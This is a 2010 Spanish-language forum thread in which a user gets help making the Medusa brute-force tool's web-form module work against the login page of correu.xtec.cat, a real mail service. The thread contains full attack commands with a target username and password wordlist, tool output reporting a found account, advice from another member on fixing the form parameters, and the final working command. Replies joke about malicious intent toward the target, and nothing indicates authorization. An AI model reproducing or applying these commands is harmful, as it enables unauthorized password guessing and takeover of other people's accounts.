Título: MEDUSA WEB-FORM Publicado por: kimpa2007 en 28 Abril 2010, 23:25 pm Buenasss
mirad estoy haciendo pruebas con el medusa pero tengo un problema. segun tengo entendido el problema esta en form-data pero no acabo de entender como funciona.. La orden que uso es la siguiente: medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat Si alguien puede ayudarme ;P Título: Re: MEDUSA WEB-FORM Publicado por: toxeek en 29 Abril 2010, 15:14 pm Que tal. Podrias poner que error te suelta?? Siempre dad la maxima info posible (errores...etc.) cuando pidais ayuda para un error como este. Que version de Medusa usas ? SaluDoS. Título: Re: MEDUSA WEB-FORM Publicado por: kimpa2007 en 29 Abril 2010, 17:04 pm pos mira cuando ejecuto la orden solo hace la primera palabra de la wordlist:
GENERAL: Module parameter: FORM:iwc_static/layout/login.html GENERAL: Module parameter: FORM-DATA:post?user=&pass GENERAL: Module parameter: DENY-SIGNAL:incorrect GENERAL: Parallel Hosts: 1 Parallel Logins: 1 GENERAL: Total Hosts: 1 GENERAL: Total Users: 1 GENERAL: Total Passwords: 10000 ACCOUNT CHECK: [web-form] Host: correu.xtec.cat (1 of 1, 0 complete) User: rstein2 (1 of 1, 0 complete) Password: rs0001 (1 of 10000 complete) ACCOUNT FOUND: [web-form] Host: correu.xtec.cat User: rstein2 Password: rs0001 [SUCCESS] INFO: Login Module: 0 - Current user password list is complete, selecting next user. INFO: Login Module: 0 - Current user password list is complete, rescanning userlist for unfinished credentials. INFO: Login Module: 0 - Current user password list is complete, selecting next user. INFO: Login Module: 0 - No more user accounts available for testing. INFO: Login Module: 0 - No more users/passwords available in the normal queue. INFO: Login Module: 0 - No additional missed users/passwords, setting credential status to CREDENTIAL_DONE. GENERAL: Medusa has finished. Título: Re: MEDUSA WEB-FORM Publicado por: kimpa2007 en 29 Abril 2010, 17:05 pm aa y la versión que uso es la v2.0
Título: Re: MEDUSA WEB-FORM Publicado por: toxeek en 29 Abril 2010, 18:52 pm Que tal. Citar medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat Primero, prueba a poner un "=" (sin comillas) tras pass. O sea, que quede &pass= Ademas, mira en el source del (x)HTML como el form esta elaborado. Si hay algun value para inputs tipo hidden a*adelos, y si Submit tiene un value (por ejemplo submit) pondlo en la cadena para -m FORM tambien. Bueno prueba y ve diciendo ;) Saludos. Título: Re: MEDUSA WEB-FORM Publicado por: toxeek en 29 Abril 2010, 19:18 pm Citar iwc_static/layout/login.html ??No sera un .php ??? Mira a ver hacia donde apunta el METHOD del form .. y asegurate que va sobre POST! Saludos. Título: Re: MEDUSA WEB-FORM Publicado por: kimpa2007 en 30 Abril 2010, 19:27 pm Ei ya he encontrado mi problema!!
Usando el HTTP live headers he podido ver que me habia equivocado en el form-data. La orden que tengo que usar es esa: medusa -u user -P /diccionaris/rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"fromlogin=true&username=&pass=" -m DENY-SIGNAL:"El" -h correu.xtec.cat -F gracias por la ayuda ;P Título: Re: MEDUSA WEB-FORM Publicado por: Debci en 30 Abril 2010, 23:40 pm Hay.... que li vols fer a l´xtec?
Salutacions... Título: Re: MEDUSA WEB-FORM Publicado por: dazoverride en 1 Mayo 2010, 19:43 pm XD xtec? jajajajaja
això em sona :P no seas malooo !! Título: Re: MEDUSA WEB-FORM Publicado por: kimpa2007 en 2 Mayo 2010, 18:51 pm jajaja yo acer algo malo a la xtec?
nunca de la vida ;) |